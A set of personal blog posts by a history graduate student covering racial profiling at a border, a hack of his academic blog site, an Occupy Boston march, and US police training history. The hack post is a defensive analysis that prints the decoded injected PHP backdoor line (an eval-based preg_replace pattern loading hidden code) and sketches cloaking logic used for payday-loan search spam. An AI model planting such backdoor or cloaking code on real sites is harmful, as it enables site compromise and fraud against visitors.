
Arizona and Bad Bentheim

There were between twenty and thirty people in my car of a Berlin-bound train from Amsterdam. The train was taking a ten-minute break in Bad Bentheim, the first stop in Germany after passing out of the Netherlands. As is the case with so many European borders today, the shift from one country to another can easily escape a traveler's notice, until perhaps they catch on that the announcements have switched from Dutch and English to German and English. Though this was not true for the whole train, all the passengers in my car were fairly pale-skinned, northern European-looking sorts, with two exceptions. One dark-tanned guy with some Spanish writing on his shirt had stepped off the train for a cigarette. The second racially distinct passenger sat in front of me, a Middle Eastern-looking guy wearing fancy-looking jeans and an Italian national football jersey. Whereas I had a large backpacker's pack and a somewhat disheveled look, he had no luggage around him and was browsing the music selection on his cellphone.

Two police officers boarded the train and walked through my car, looking at the people in each seat. Only later did I realize that this is what counts for border control within the Schengen Area these days.

Of the more than two dozen people in my car, the two officers spoke to only one person. They asked only one passenger where he was going, where he was coming from, how long he intended to stay, and where his luggage was. They asked only one passenger to produce his passport, and then subjected each and every one of its pages, most of them blank, to close inspection. They were polite, respectful, and spoke excellent English. When they found nothing wrong with his Italian passport, they handed it back, wished him a good journey, and moved on to the next car.

Though the man sitting in front of me didn't seem annoyed by the encounter, I couldn't help feeling a shiver run down my back and an anger swell within me. I was reminded that this happens every day, all over the world, in all sorts of contexts, and that however rational it might seem to the one asking for the documents, racial profiling is unjust, pure and simple.

A Tale of East Asian History, British Loan Sharks, and a Russian Hacker

A few weeks back I woke up at 6:30 in the morning to a phone call.

“I would like to buy your domain froginawell.net. $500, what do you say?”

I instinctively tried to answer in a voice that did not reveal the fact that I had just been jolted out of deep sleep. There may have been a few introductory sentences preceding this very forward proposition, but I wasn't fully conscious yet.

Frog in a Well is a site I created back in 2004 to host a few academic weblogs about East Asian history, authored by professors and graduate students. I haven't been posting much there while I finish my PhD dissertation, but some of my wonderful collaborators have been keeping it active. Since we have a good stock of postings on a wide range of topics in East Asian history, the site attracts a fair amount of traffic, especially from those searching Google for "ancient Chinese sex" or, apparently, "Manchu foot binding." I think these visitors find the resulting links insufficiently titillating for their needs. Our site has been ad-free, however, and I fully intend to keep it that way.

I turned the gentleman down and went back to sleep. When I reached the office, I saw an email from the man; let's call him Simon. It had come in a few minutes before he called and made the same direct offer. I replied to his email and explained that I had no wish to sell the domain.

A week later Simon emailed again. This time he wanted to rent my domain.

Looks like someone’s tried to hack you unless you have changed your home page title?? Anyway your ranking has increased for my key phrase and I really want to rent that home page. I will increase my offer to $150 PER DAY.

$150 per day? Key phrase? What key phrase did Frog in a Well offer him? His email address suggested he worked at a solar energy company in the UK. The site looked legitimate, offering to set up solar power for homes for a “reasonable price.” I searched in vain for any clue as to why he would want the domain froginawell.net. I did a search on our site for anything to do with solar power or energy. Nothing stood out. I didn’t want to ask him, since I didn’t want to get his hopes up.

As for the hacking, this had happened before. Sometimes I have been a little slow in getting our WordPress installations upgraded, and twice before our blogs have been hit with something called a "pharma hack." This insidious hack leaves your website looking just as it did before, but changes what Google sees when it crawls your site, turning all blog post titles into advertisements for every kind of online drug-ordering site you can imagine. It is notoriously difficult to track down, as the hackers are getting better and better at hiding their code in the deep folder hierarchies of WordPress or in uninspected corners of your database.

This time, however, it looked like there was no pharma hack. Instead, my home page for froginawell.net had been changed from a simple HTML file into a PHP file, allowing it to execute code. The top of the file had a new line added to it: a single command followed by a bunch of gibberish. At the time, I had no chance to look at it in depth; I was trying to wrap up the penultimate chapter of my dissertation. I removed the offending text, transformed my home page back into HTML, changed the password on my account, reinstalled the China blog (which had been hacked before) from scratch, and sent an email to my host asking for help in dealing with a security breach. My host replied that they would be delighted to help if I paid them almost double what I was currently paying by adding a new security service. Otherwise, I was on my own.

After my rather incomplete cleanup, based on where I thought the hacked files were, I replied to Simon, "The offer is very generous, but I'll pass. I've decided to keep our project ad-free."

Simon wrote back again the same day. He was still seeing the title of my hacked page on Google. I couldn't see what he was talking about when I searched for Frog in a Well on Google, but I assumed he was looking at some old post that Google had cached back when the site was in its hacked form. Simon wrote:

Do you realize why people are suddenly trying to hack you? Because of the earning potential your site currently has.

I would appreciate if it you would name your price because everyone has one and I don’t want either of us to miss this opportunity. I can go a somewhat higher on the daily fee if it would strike a deal between us. How about $250 per day. If money is no object then donate the $250 a day to charity.

$250 a day? This was downright loopy and getting more suspicious all the time. I was traveling over Memorial Day weekend at the time. Even if the offer was real, and even if I had been willing to turn the Frog in a Well homepage into someone's ad, it would have been a pain for me to deal with, and the whole thing was too fishy. I turned him down and told him I considered the matter closed: I wouldn't accept ads on Frog in a Well at any price.

Simon wrote back one last time.

As a businessman I always struggle with the concept of no available at any price when it comes to a business asset. However, I respect your decision and will leave you with this final message. I will make one final bid then will be out of your hair if you decide you do not want it. $500 per day payable in advance. Practically $200,000 a year.

He was clearly perplexed at my refusal to behave like a rational economic actor. I completely understand his frustration. Perhaps he hasn’t met many crunchy socialist grad student types. I wrote him back a one-liner again turning down his offer but wishing him luck with his business, which, at this point, I still assumed was a solar power company.

When I got home, I determined to resolve two mysteries: 1) what was Simon seeing when he found Frog in a Well on Google in its hacked state? 2) Why on earth would Simon want to go from $500 total to buy my domain to $500 a day to rent it?

The first thing I discovered was that my site was still compromised. The hackers had once again modified my home page, turning it into a .php file and adding a command full of gibberish at the top. Their backdoor did not reside, as I had assumed, in the oldish installation of the China blog I had replaced, but somewhere else. I would have to have a go at reverse engineering the hack.

Anatomy of a Hack

The command that the hackers added to the top of my home page was "preg_replace," which in PHP searches some text for a pattern and replaces it with some other text:

preg_replace("[what you are searching for]","[what you wish to replace it with]","[the text to search]")

In this case, all of this was obscured with a bunch of gibberish like "\x65\166\x61\154". This text is actually just an alternating mix of ASCII character codes in two different formats, hexadecimal and octal. PHP knows not to treat them as regular characters because of the escape character "\", followed by an x for the hexadecimal values. You can find their meanings on this chart. For example, the text above begins with \x65, the hexadecimal code for "e", then the octal code for "v", back to hexadecimal for "a", and finally octal for "l": all together, "eval".

This makes it extremely difficult for a human such as myself to see what is going on, but it is perfectly legible to the computer. I had to restore all the gibberish to regular characters. I did this with Python: on my Mac, I just opened up Terminal, typed python, and then printed out the gibberish ASCII blocks with the print command:

print("[put your gibberish here]")

Applied to the full block of gibberish, this yielded a command that said:

Look for: |(.*)|ei
Replace it with: eval('$kgv=89483;'.base64_decode(implode("\n",file(base64_decode("\1")))));$kgv=89483;
In the text: L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc=

Now I was getting somewhere. But what is all this new flavor of gibberish at the end? One note first: the "e" at the end of the search pattern is the key to the whole hack, since PHP's (now deprecated) e modifier tells preg_replace to evaluate the replacement string as PHP code, which is how a one-line "search and replace" becomes a code launcher. The text at the end, meanwhile, is encoded using the Base64 encoding method. If you have a file containing only Base64-encoded text, you can decode it on the Mac OS X or Linux command line with:

base64 -i encoded-text.txt -o decoded-output.txt

You can also decode base64 in Python, PHP, Ruby, etc. or use an online web-based decoder. Decoded, this yielded the location of the files that contained more code for it to run:

[…]public_html/korea/wp-includes/js/crop/log/.%828E%0013%B8F3%BC1B%B22B%4F57
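The same decoding takes only a couple of lines of Python. Here is a minimal sketch (the variable name is mine; the encoded string is the one quoted above):

import base64

encoded = "L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc="
print(base64.b64decode(encoded).decode("utf-8"))   # prints the hidden directory path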

It wasn't alone. There were a dozen files in there, including the text for an alternate homepage. The code in my home page, with a single command up front, was running other commands hidden in a folder deep in the installation of my Korea blog. Even these filenames and their contents were obscured with a variety of methods, including Base64, MD5 hashes, characters turned into numbers and offset by arbitrary values, and various contents stored in the JSON format. I didn't bother working out all of the details, but it appears to serve a different home page only to Google and only under certain circumstances.

One of the hacked files produced a version of the British payday loan scam speedypaydayloan.co.uk, which connects back to a fake London company, "D and D Marketing," discussed in various places online for its scams. In other words, for Britain-based, and only Britain-based, visitors to Google who were looking for "payday loans," a craftily hacked homepage at Frog in a Well was apparently delivering them to a scam site or redirecting them to any one of a number of other sites found in a large encoded list on my server.
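In rough outline, the cloaking logic the decoded files appeared to implement looks something like the sketch below. This is my approximation in Python, not the hacker's actual code (which was obfuscated PHP), and the file names are invented:

def choose_page(user_agent, referer):
    # Search engine crawlers are served the fake, keyword-stuffed homepage
    if "Googlebot" in user_agent:
        return "alternate_homepage.html"
    # Visitors arriving from a UK Google search for the key phrase get the scam
    if "google.co.uk" in referer and "payday" in referer.lower():
        return "scam_redirect.html"
    # Everyone else, including the site owner, sees the real site
    return "index.html"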

I soon discovered, however, that these files were not the only suspicious ones in the Korea blog installation. These were just the files which produced the specific result desired by the hacker. After a lot more decoding of obscured code, I was able to find the delivery system itself. To deploy this particular combination of redirection and cloaking, the attacker was using a hacker's dream suite: something called "WSO 2.5." Once they found a weakness in an older version of WordPress on my domain, they were able to install the WSO suite in a hidden location separate from the above hack. Though I don't know how long this YouTube video (without sound) will remain live, you can see what the hacker's view of WSO looks like here. The actual PHP code for a plain, un-obscured installation of the backdoor suite that was controlling my server can be found (for now) on Pastebin here.



Simon and Friends

So how does this connect back to our friend Simon and his solar power company? Google Webmaster Tools revealed that the top search term for Frog in a Well was now "payday loans," and that it had shot up in the rankings sometime in early May, when the hack happened, with hundreds of thousands of impressions. Something was driving the rankings of the hacked site way up.

Simon had written in one of his emails that he had "many fingers in many pies," which suggested that he was working with more than just a solar power company. After figuring out what my hacked site looked like, I searched for his full name and "loans uk" and soon found that he (and often his address) was listed as the registrant for a whole series of domains, at least one of which had been suspended. These included a payday loan site, a mobile phone deal website, a home loan broker, some other kind of financial institution that no longer seems to be around, and another company dedicated to alternative energy sources. My best guess is that Simon's key phrase was none other than "payday loans" and that he saw a way to make a quick buck by getting one of his financial scams advertised through the newly compromised Frog in a Well domain. Was he really serious about paying that kind of money? What had been his plan for how this would pan out? Did he know that the Google ranking was probably a temporary result of a deeply hacked site?

Simon's offer of $500 was not the last. I removed all the hacker's files, installed additional security, changed passwords, and began monitoring my server's raw access logs. I requested a review of my website by Google through Webmaster Tools, which will hopefully get me out of the payday loan business in the UK. However, the offers continued to come in.

Luke, one of Simon’s competitors (again, I’m changing all names), wrote me a polite email with a more forthcoming offer that confirmed what I had found by poking through the files:

You may not be aware but your site has been hacked by a Russian internet marketing affiliate attempting to generate money in the UK from the search term “payday loans”…As a rough indicator this link is worth around $10,000 a week to the hacker in its current location. We are a large UK based competitor of this hacker and whilst we don’t particularly his activity, we’d like to stop him benefiting from this by offering to replace this hyperlink on your site which he has inserted and pay you the commissions weekly…

It was “clever stuff,” he explained, “but very illegal.” I turned him down politely.



No sooner had I cleaned up my server than it came under a DoS (denial of service) attack. The three blogs at Frog in a Well were hit by about a dozen zombie bots from around the world, which tried to load the home page of each blog over 48,000 times in the span of ten minutes. My host immediately suspended my account for the undue stress I was causing their server. They suggested buying a dedicated server for about ten times the price of my current hosting. I had moved to the current host only a year earlier, when our blogs came under a DoS attack, mostly from China, and the earlier host politely refused to do anything about it. My current host was kind enough to reinstate the site after a day of monitoring the situation, but there is nothing to prevent an attacker from hiring a few minutes of a few bots to take down the site again. It is a horrible feeling of helplessness that can really only be countered with a lot of money – money I was not about to make by entering the payday loan business. To add a show to the circus, within hours of the suspension two separate security companies contacted me, promising protection against DoS attacks and asking if I wanted to discuss signing up for their expensive services. How did they know I had been hit by a DoS attack in the first place, and not suspended for some other reason?

A few days later, yet another payday loan operator, let us call him Grant, contacted me through Twitter. He explained that the "Russian guy" who he believed had hacked me was likely "untouchable for his crimes" thanks to his location, but again suggested that we "take advantage of this situation" and split the proceeds of linking my site to him 50/50.

I will pay you daily, depending on how much it makes either by Paypal or bank transfer. As an indication of potential profits, when I have held 1st place I have been regularly making £15,000 per day. I can see your site bouncing around the rankings so I am unsure how much it would make… I suspect it would be comfortably into 4 figures a day but without trying I can’t say for sure.

I turned him down and explained that I had cleaned out the hack; it would take some time before this was reflected on Google. However, in response to my request for more information about what he knew about the hack, Grant kindly sent me a long list of other sites that had been hacked by my attacker but whose only role in this game was to backlink to Frog in a Well with the link text "payday loans" so that Google would radically increase my ranking. Luke had suggested that this approach was only effective because Frog in a Well was already a relatively "trusted" site in Google's eyes. Grant (emailing me directly from the beach, he said, which I guess is a good place for someone pulling in thousands of pounds per day on this sort of thing) also supplied me with half a dozen other sites that were now being subjected to the very same cloak-and-redirect attack. He speculated that I had come under DoS attack from one of his other competitors who, instead of attempting to buy my cooperation, had spent the negligible sum required to simply knock me off the internet.

Hopefully my ordeal will be over soon, and I need merely keep a closer eye on my servers. For Grant, Luke, and Simon, however, their Russian nemesis continues his work. A last note from Grant reported,

There is an American radio station ranking for payday loans on google uk now, so that’s yet more work for me to try and undo lol.

Notes from A Solidarity March with Occupy Boston

On Monday I joined the Student Solidarity March for Occupy Boston together with a few friends, and I thought I would share a few notes.

I don't have much experience with protesting. Though I consider myself politically active, I have joined fewer than half a dozen large protest rallies and marches, and almost all of them were related to the issue of immigration. It was a fascinating experience, differing in many ways from the other protests I had joined before, but again, given my small sample size, it is very possible that some of the elements described below are in fact common features, and my observations merely reveal the ignorance of a tourist.

Harvard University Occupies Boston

The first scene was at Harvard. Before converging on Boston Common, where the main march was to begin, students from around the city gathered at their own universities. Harvard and MIT students were, at least according to the posters and emails before the gathering, to assemble together and occupy the subway (since we were apparently too lazy to walk the hour or so downtown). The initial assembly point was the wonderfully neutral location of the John Harvard statue inside the Harvard campus (meeting at MIT would have put us much closer to the main march). I showed up wearing a Columbia shirt to break the Crimson tide, thus, of course, completely sparing myself any elitist stain. Instead of hiking up deep into our territory, our MIT friends made it downtown in a few separate groups, presumably in flying cars, teleportation devices, or astride their communally shared fleet of robot dogs.

The poster for the event, advertising "Harvard University Occupies Boston," was the first reminder of the somewhat awkward positionality of our merry band. Of course, Harvard University already, in a very real sense, occupies Boston: through the power the university itself wields, through what it represents, but most directly through the many graduates of the university who heavily populate the ranks of the financial, consulting, and law firms throughout the city. This awkwardness would continue to manifest itself whenever the slogan "We are the 99%" was yelled. We debated among ourselves the intricacies of how that phrase might be construed to include or exclude us. Should we write self-criticisms, joked one; the idea may well have received a warm reception if put to the crowd.

Hallelujah and The People’s Mic

Somewhere between 50 and 5,000 people showed up at the John Harvard statue, but, as you know, counting attendance at protests is an inexact science. Before we boarded the subway downtown, there were posters to be made and an opportunity for discussion.

The Occupy Boston and Occupy Wall Street movements are extremely decentralized, with diverse groups and diverse goals represented. They are thus easy to mock and hard to categorize. They are becoming harder to ignore, however, and I joined in order to express my support but also to try to better understand the movement. If the political goals are still varied, there seems to be, at least, a set of common practices emerging. Let me list a few of them:

Many Groups, One Shopping List – Despite the diversity, they seem to be incredibly organized online, where you can find news, a press kit, a garbage collection schedule, general assembly videos, and even a unified shopping list.

The People's Mic – Though our pre-march discussion was too short to see it fully in action, direct democracy assemblies are designed to allow anyone to speak. To make sure that everyone can hear the speaker, everything spoken is repeated by the crowd, phrase by phrase. I'm told this comes from the Occupy Wall Street protests, where a ban on voice-amplifying devices made the innovation necessary. To speak before the group you add your name to a "stack" (waiting list) which one of the facilitators manages. When it is your turn you yell, "Mic Check!" and the crowd responds with "Mic Check!" After that, every phrase you utter will be repeated by the crowd, though I noted that when more extreme or controversial things were said, the mass echo was notably less enthusiastic. It is a fascinating technique, which surely makes long political meetings slightly more than twice as long, but for this very reason it encourages brevity and clarity in a speaker. The effect can be intoxicating, and also very empowering. The nagging Orwellian feel of the robotic repetition is well mitigated by the fact that you are not repeating the words of "The Leader," but of everyone who speaks. Rachel Maddow describes the practice and shows examples:
People’s Mic! Today’s Best New Thing in the World

Gesturing the Revolution – The first task carried out by the "facilitators" at the John Harvard statue (who nominated these people to be our facilitators, and what organizations they came from, was not, as far as I can remember, ever revealed) was to give us a basic education in crowd communication. After explaining the People's Mic, they introduced us to a system of hand signals I had never seen before but which has been commented upon in various media reports. Our lesson included the following instructions:

1. If you agree with what a speaker is saying, raise your hands and wiggle your fingers. If you had not been told its purpose, you might suspect the person was offering a "Hallelujah!"
2. If you are more ambivalent about what a speaker is saying, you wiggle your fingers in front of your chest.
3. If you disagree with the speaker, you hold your hands in front of your chest and flop them down in a motion that to me looked like a begging dog.
4. If you wish to ask a clarifying question, you hold up your hand and make the letter "C".
5. If you wish to make a "process point," which I guess is a kind of point of order, you make another hand signal that I believe resembles a triangle or perhaps a "T".
6. If you find what the speaker is saying offensive, you cross your arms over your head, creating a large "X".

At this point an apparently experienced protester in the audience asked why they did not use a common gesture to indicate that you want to make a direct counter-point. One of the leaders—I'm sorry—facilitators, made the reasonable point that such a gesture makes it impossible to have smooth discussions without their devolving into rowdy debates. Instead, people who disagreed were to add their names to the "stack" and speak in turn.

Now trained in the semiotic arts of the revolution, we began a discussion, and a few people on the "stack" spoke, but besides a few Hallelujahs we didn't get to deploy the full range of our newly acquired vocabulary before leaving for downtown.

Does anyone know more about the origins of this system? In addition to serving as a system of immediate speaker feedback, this appears to be the primary system used for consensus formation at protest general assemblies, via a non-binary process known as a "temperature check." I have seen mention of it in reference to the recent student protests in London. This Guardian article includes a great gesture for "I'm bored," which I must remember to deploy at appropriate moments in academic lectures. I see gestures like those we learned described in Consensus: A New Handbook for Grassroots Social, Political, and Environmental Groups, but that work argues strongly against having any gestures of a negative kind, in order to reduce speaker anxiety and create a more welcoming environment.

Lawyer Tags – Several people moved through our group of protesters distributing little tags for us to tie to our arms. On one side was information about our protest: the protest Facebook page, Google group, and a contact email. On the other side was the telephone number for the National Lawyers Guild, an important, nothing if not radical, legal organization that supports protesters in their encounters with law enforcement. In the event of an arrest, all of our belongings might be confiscated or discarded, so this little tag was a nice reference card. We were also encouraged to copy the phone number onto our arms, since the tag might easily be lost.

I should note that both while we were being told about the tags and later on Boston Common, there was a repeated and strong emphasis on showing respect for law enforcement, on non-violence, and on following the law (except, I guess, those laws we break). Which brings me to another fascinating innovation that I had only seen glimpses of in the news before:

Legal Observers – When we got to the assembly point on Boston Common, there were bands playing, the usual anarchists occupying the central gazebo (demonstrating once again the principle that the early herd gets the gazebo), and a wide array of people around the edges. As each new university group arrived (Tufts and UMass had particularly strong showings, with the latter taking full advantage in their slogans of the fact that the word "mass" is in their name), everyone cheered their arrival. Before the full march began, however, more facilitators (again, I have no idea who they were or what organizations they represented) gave us more training through the People's Mic. They pointed to a number of individuals in neon hats and vests hovering around the edges of our mass, just in front of a row of police officers observing us. These were to be our "legal observers," tasked with the job of being neutral observers of the protest. They would monitor the behavior of the protesters and especially observe any clashes or interactions between the protest and law enforcement. Since I believe at least some of them were from the National Lawyers Guild, I have some doubts about their neutrality, but overall, I must say, I was quite impressed by their number, and I think their presence on the sidelines throughout the march was a great comfort, even if no one expected a clash with the police.

Protest as Socializing Process

My overall experience on Monday was very positive. The energy, most of it positive, and the diversity of the people involved left a strong impression on me. The slogans were often pointlessly populist, dry, or clichéd, and clearly many of us were just a bit confused about what the whole experience added up to. We marched down to occupied Dewey Square and circled around it. Later that night, some students and others who decided to join the "occupation" were arrested by the police; I'll await more accounts of what transpired before commenting on it. I do hope the occupation continues, even if it does not graduate beyond the realm of political experiment, and that it evolves and develops politically.

There are a whole slew of ways this movement is being described and justified by its sympathizers and participants alike. I have not yet formed a strong opinion on how best to conceptualize it, but I feel that on at least two levels something important is happening. From the outside, as long as the "occupy" movement continues and grows without becoming violent, it has a place at the table of political discussion. Its destabilizing effect can play a very important part in a stalled political process. Even if its internal unity remains dependent upon its ambiguity, it is like Poe's tormented Raven, which, "never flitting, still is sitting, still is sitting / On the pallid bust of Pallas just above my chamber door."

From the inside, even from the limited contact I had with the movement on Monday, participation in a movement like this is a socializing process, especially when it is full of innovative approaches: it socializes participants while also teaching them a set of valuable political practices that can, in turn, be deployed again and again with greater focus in a whole range of circumstances. Monday was a holiday, but I very much felt like class was in session.

San Martin and Maoland – US Training of Police in the Art of Crushing Protests

Watching the events unfold in Egypt, and earlier in Tunisia, I have been fascinated by the evolving role of the police. Though this is also true in the Tunisian case, the Egyptian police have long been particularly infamous for their rampant use of torture, a fact sometimes taken advantage of by the US. These police forces recently revealed their complete incompetence and senseless cruelty to the world, as plentiful footage showed their beatings, lethal vehicle charges, and ultimate dissolution in the face of massive protests in major cities across the country. Since then, at least some of their officers appear to have shed their uniforms and re-engaged with hired or sympathetic government supporters.

While we are constantly reminded of US connections to the Egyptian military, these events remind me of the history of US ties to repressive police institutions around the world that would clearly recognize their own behavior in Al Jazeera footage and in countless YouTube clips uploaded in the past week or two. Throughout the Cold War, but especially from 1962 to the mid-1970s, the United States engaged in an intensive effort to train police from allied states on a scale not seen again until the Afghanistan and Iraq wars. Run primarily through the Office of Public Safety (OPS) and funded by USAID, this campaign was never primarily a matter of generally developing police efficacy and professionalism, though many OPS police advisors and USAID officials were personally committed to those causes. From the beginning, this effort was defined as the core of a counter-insurgency strategy designed to thwart "interests inimical to the United States" threatening friendly regimes before they became powerful enough to require full military intervention. The organization was heavily infiltrated by CIA officers, placed there under the guidance of Byron Engle, the OPS director and a former CIA operative himself.1

One important center of the police training provided by the US during the 1960s and 1970s was the International Police Academy (IPA) which was housed in the “Car Barn,” a building complex which now houses offices for Georgetown University in Washington D.C. Though accusations abound, I have not found any persuasive evidence that torture techniques were taught or tolerated at the academy, and it seems clear that, on the contrary, many US instructors went out of their way to deplore the use of torture and argue that it is inefficient, ineffective, and highly damaging to civil-police relations. It is also clear, as several accounts I have read claim, that many of the students disagreed with their instructors, and openly debated the virtues of torture with each other even while in attendance. There is much more to be said on this, but here I wish to introduce one anecdote I came across about the IPA in A. J. Langguth‘s 1978 book Hidden Terrors which reveals the degree to which US training was explicitly designed to help its allies maintain a lock on power in the face of a protesting opposition.

San Martin and Maoland

The IPA designed a number of exercises to test the ability of police officers to respond to a political threat in the imaginary country of San Martin. Neighboring this state was the diabolical Maoland, which was always trying to spread revolution. In the exercises, IPA faculty would play the role of Maoland infiltrators, while students were split into those who assisted in plotting the revolution, those who crushed the uprising, and those who judged between the two.

In one exercise Langguth recounts, an aerial photograph of Baltimore served as a map of San Martin, and demonstrations organized by the Maoland revolutionaries were plotted out on it. One part of the exercise came to mind as journalists and human rights activists were rounded up in Cairo yesterday. As the student police proceeded to execute their plans, if things were going too easily, IPA instructors, posing as the Prime Minister, would call in and declare, "My problem is the reporters on the scene. They're getting in the way and interfering with our police work." (p. 129) If the police stalled, the same complaint would come in several times, until a student police chief finally responded, "All right…arrest them! Bring them in!" This would give the students ten minutes of relief before more demands for specific actions came over the phone.

Apparently, the students really enjoyed the San Martin and Maoland role-playing opportunities, though they complained that the communications and anti-riot equipment deployed in the exercises was rarely available to them at home (130). Senior officers found the exercises nerve-wracking, since their actions could be immediately judged by their peers, potentially including younger or less experienced policemen.

Films were apparently often used in training, including one filmed in Panama but again claiming to be set in a politically unstable San Martin. Other movies, like The Use of Tear Gas to Preserve Order, served as marketing material for the Lake Erie Chemical Company (one wonders whether Combined Systems International of Jamestown, Pennsylvania, which supplied tear gas to the Egyptians, has similar marketing films for its Egyptian customers). Another movie, mentioned both in Langguth's Hidden Terrors and in a congressional report dated February 1976, is "Battle of Algiers." This is a fantastic movie but also a highly complex one, from which a whole range of lessons can be drawn. I came away from it horrified by the images of torture used and defended by the French, as well as by the terrorism of the FLN and other non-state actors.

The congressional report, written as the US began to wind down its police training efforts or shift them to function under the guise of anti-narcotics efforts, investigated accusations of torture training being carried out at the IPA. The showing of "Battle of Algiers" in an interrogation class was the closest it came to finding anything controversial, due to the film's depiction of "questionable techniques of extracting information," but it noted the academy's protest that the movie was meant to "bring out how abhorrent inhumane methods of interrogation can be."2 That could well be true, as my own reaction to the film suggests, but it may also have provided a pretext for students, many of whom had plentiful experience with the kinds of techniques shown in the movie, to weigh in with their own thoughts. It all depends on how the instructors handled it.

Though not connected to the San Martin and Maoland exercises, I mention this movie because it has an ironic connection to the demise of the Office of Public Safety. The scriptwriter of "Battle of Algiers," Italian Communist Party member Franco Solinas, also wrote the script of "State of Siege," the 1972 movie which cast unwanted light on the OPS. That film was likewise set in a fictional Latin American country (though based on real events in Uruguay), but this time, instead of depicting brave police efforts to crush a rebellion, it incorporated many of the accusations and rumors of direct US police advisor involvement in torture.3 Though I am not convinced the more sensationalist accusations of OPS involvement in torture are true, its advisors came into daily contact, as US soldiers and operatives in Iraq and Afghanistan do, with allied security forces who openly discussed and engaged in intolerable acts of brutality.

Today's San Martin is Egypt, an American ally of critical importance in protecting US interests in the Middle East. The Maoland infiltrators, as Egyptian state television would have its audience believe, are on the streets promoting the subversive interests of foreigners. I hope the United States comes to the crystal-clear realization that history will, in this case too, not treat its connection to this brutal regime kindly; more importantly, neither will the Egyptian people.

  1. I am deeply interested in Byron Engle due to his leading role in Japanese police reforms and only recently came across his long career as a Cold Warrior after he left Japan.
  2. See "Stopping US Assistance to Foreign Police and Prisons," 16. OPS head Byron Engle denied the movie was ever shown at IPA in an interview with Langguth. Hidden Terrors, p. 324.
  3. This is discussed in Langguth's Hidden Terrors, 304-308.

Little dh and Planting Seeds

The following is a reposting of an entry I contributed to the THATCamp New England blog:

I am excited to have the opportunity to join THATCamp New England this November and look forward to learning from everyone I meet there. I was asked to post an entry here about the issues I hope will be discussed at the event. I have no doubt many of the main themes I'm interested in will receive plentiful attention, but I would like to bring up two issues that I find particularly important: 1) the continued need for the appreciation and promotion of what I'll call the "little dh" of the digital humanities, and 2) an action-oriented discussion about the need to plant seeds within each and every department: seeds that cultivate both real skills and an appreciation for a spirit of experimentation with technology in the humanities, not merely among the faculty but, even more importantly, as part of the graduate curriculum.

Little dh

I have been unable to keep up with the ever-growing body of scholarship on the digital humanities, but what I have read suggests that much of the work that has been done focuses upon the development of new techniques and new tools that assist us in conducting research and teaching in the humanities in roughly four areas: the organization of sources and data (for example, Zotero and metadata practices), the analysis of data (e.g. using GIS or statistical text analysis), the delivery and representation of sources and research results (e.g. Omeka), and effective means for promoting student learning (e.g. teaching with clickers, promoting diverse online interactions).

I'm confident that these areas should and will remain the core of the digital humanities for the foreseeable future. I do hope, however, that there continues to be an appreciation for digital humanities with a small "d," or little dh, if you will, which has a much longer history and, I believe, will continue to remain important as we go forward. So what do I mean by little dh? I mean the creation of limited, often unscalable, and usually quickly assembled ad hoc solutions tailored to the problems of individual academics or specific projects. In other words, hacks. These solutions might consist of helping a professor, student, or specific research project effectively use a particular combination of software applications, writing short scripts to process data or create workflows that move information smoothly from one application to another, building customized web sites for highly specialized tasks, and so on. These tasks might be very simple, such as helping a classics professor develop a particular keyboard layout for a group of students or a particular project. Or they might be more complex: helping a Chinese literature professor, for example, create a workflow to extract passages from an old and outdated database, perform repetitive tasks on the resulting text using regular expressions, and then transform that text into a clean website with automatic annotations in particular places.
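To make this concrete, here is the kind of five-minute script such a workflow might involve. This is purely illustrative: the file names and the 【...】 annotation convention are invented for the example:

import re

# Read a plain-text dump exported from the old database
with open("database_export.txt", encoding="utf-8") as f:
    text = f.read()

# Wrap every passage marked with 【...】 in an HTML annotation span
html = re.sub(r"【(.+?)】", r'<span class="annotation">\1</span>', text)

with open("annotated.html", "w", encoding="utf-8") as f:
    f.write(html)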

The skill set needed to perform "little dh" tasks is such that it is impossible to train all graduate students or academics in it, especially if they have little interest in, or time for, tinkering with technology. "Little dh" is usually performed by an inside amateur (the departmental geek, for example) or with the assistance of technology services at an educational institution willing to go beyond the normal bounds of "technical support" defined as "fixing things that go wrong." Unfortunately, my own experience suggests that the creation of specialized institutes focusing on innovation and technology in education has sometimes reduced scholars' access to resources that can provide little dh rather than increasing it, because it is far sexier to produce large tools that can be widely distributed than to provide simple customized solutions for the problems of individual scholars or projects. One such center for promoting innovative uses of technology in education that I have seen in action, for example, started out providing very open-ended help to scholars but quickly shifted to creating and customizing a very small set of tools that may or may not have been useful for the specific needs of the diverse kinds of scholarship being carried out in the humanities. There is a genuine need for both, even though one is far less glamorous.

I hope that we can discuss how to continue to provide, and expand, the availability of technical competence that can help with little dh solutions within our departments, and how to recognize the wide diversity of needs within the academic community, even as we celebrate and increasingly adopt more generalized tools and techniques for our research and teaching.

Planting Seeds

I have been impressed with the progress of the digital humanities amongst even the more stubborn professors I've come across, in three areas: 1) an increasing awareness of open access and its benefits to the academic community, 2) an appreciation for the importance of utilizing online resources and online sites of interaction, and 3) the spread of bibliographic software amongst the older generation of scholars. These are, to be honest, the only areas of the digital humanities that I have really seen begin to widely penetrate the departments I've interacted with, both as a graduate student and earlier as a technology consultant within a university. I'm now convinced the biggest challenge we face is not teaching the necessary software and techniques to the professors and scholars of our academic community, but the pressing need for us to, as it were, "poison the young," and infect them with a curiosity for the opportunities that the digital humanities offer to change our field in the three key areas of research, teaching, and, most threateningly for the status quo, publishing.

There are a growing number of centers dedicated to the digital humanities, but I wonder if we might discuss the opening of an additional front (perhaps such a front has already been opened, and I would love to learn more of it): an attempt to plant a seed of the digital humanities within every university humanities department by asking graduate students to take, or at least offering them the opportunity to take, courses or extended workshops on the digital humanities that focus on some basic training in self-chosen areas of digital humanities techniques and tools, the cultivation of a spirit of experimentation among students, and a more theoretical discussion of the implications of the digital humanities for the humanities in general (particularly for professional practices such as publishing, peer review, and the interaction of academics with the broader community of the intellectually curious public). Promoting the incorporation of such an element into the graduate curriculum will, of course, be a department-by-department battle, but there are surely preparations we can make as a community to help arm sympathetic scholars with the arguments and pedagogical tools needed to bring that struggle into committee meetings at the university and department level.

Zotero and DEVONthink

I have a bibliographic database in Zotero. Citation information is easy to scrape from web databases such as my own library's, Amazon, and the many journal databases that I use. It is convenient to be able to tag and organize my sources, and I can use Zotero to format footnotes and bibliographies for my dissertation and other papers.

